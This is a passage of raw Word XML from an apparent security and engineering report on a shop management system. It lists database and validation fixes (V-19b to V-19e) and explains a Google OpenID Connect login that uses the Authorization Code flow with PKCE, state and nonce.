    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V-19b : Two audit tables could never be created.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> grn_adjustment_histories.adjusted_by and return_to_stock.returned_by were declared NOT NULL and then given ON DELETE SET NULL foreign keys, which MySQL refuses (errno 150). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="16" w:firstLine="68"/>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These are the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">audit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables, and nullOnDelete() is the deliberate choice to keep history after a staff member is deleted so on any rebuilt environment the stock-adjustment audit trail was simply absent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr>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V-19c : Validation and storage disagreed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> users.phone_no_02 is NOT NULL while every validation rule calls it nullable , so creating a user without a second phone number returned 500. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">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Found by our own test suite.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> It matters because before V-07 that raw SQLSTATE reached the caller, and because creating staff accounts is now the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">only</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> way in since public registration was removed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V-19d : Validation failures masked as server errors.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eleven catch (\Exception) clauses swallowed ValidationException , returning 500 instead of 422 and hiding input-validation problems from clients and monitoring alike.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V-19e : Tests ran against the live database.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> phpunit.xml had both DB_ lines commented out, so php artisan test ran against whatever .env pointed at. Any test using RefreshDatabase would have been translated.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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6. OAuth 2.0 / OpenID Connect implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">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6.1 What it does and why this feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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implemented </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google OpenID Connect sign-in using the Authorization Code flow with PKCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, applied to the staff </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">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It is the deliberate replacement for the public self-registration removed in V-01, and the two halves reinforce each other:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1093"/>
        <w:gridCol w:w="4801"/>
        <w:gridCol w:w="4300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1093"/>
            <w:gridCol w:w="4801"/>
            <w:gridCol w:w="4300"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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5">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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86">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87">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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Authorization</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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88">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Before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89">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self-asserted -anyone could POST role: admin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8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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none</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8B">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After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8C">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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asserted by Google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8D">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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granted by the shop owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">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 administrator creates the staff account and records the work email. The employee proves they control that mailbox by signing in with Google. Two different parties are involved, which is the point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">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It also raises the floor under administrator accounts: an admin signing in with Google is protected by whatever 2FA is on that Google account the nearest thing to MFA this project delivers (see NF-3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">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6.2 Why Authorization Code + PKCE, and not Implicit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implicit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> grant returns the access token in the URL fragment, where it lands in browser history, in Referer headers and in any logging proxy on the path. OAuth 2.1 removes it for exactly that reason.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization Code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flow returns a short-lived, single-use code instead, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PKCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFC 7636) binds that code to the browser that began the flow: an attacker who intercepts the code cannot redeem it without the code_verifier .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">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We apply PKCE even though this is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confidential</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> client holding a client secret, because the secret protects the backend's identity, not the code in transit. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">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S256 only</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  a plain challenge </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the verifier, so anyone who sees the authorize request already has it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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6.3 The flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6507805" cy="43434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50780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before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"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The three one-time values, and why each is needed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1063"/>
        <w:gridCol w:w="1470"/>
        <w:gridCol w:w="7661"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1063"/>
            <w:gridCol w:w="1470"/>
            <w:gridCol w:w="7661"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="671"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8">
            <w:pPr>
              <w:spacing w:after="0"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99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="24"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Defends against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A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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How</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="90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B">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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state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C">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CSRF / session fixation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9D">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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Ties the callback to a flow </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">this server</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> started, so an attacker cannot hand a victim a crafted callback URL and log them into the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">attacker's</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> account — where everything the victim then does is visible to them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="67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E">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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nonce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F">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Token replay</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A0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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Embedded in the ID token by Google and checked on return, so a token captured from one sign-in cannot be submitted again</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="688"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A1">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3" w:firstLine="4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code_ver ifier</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A2">
            <w:pPr>
              <w:spacing w:after="36"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Code</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">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interception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4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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Proves the party redeeming the code is the party that requested it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">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All three are held </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server-side</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the cache and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deleted when consumed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
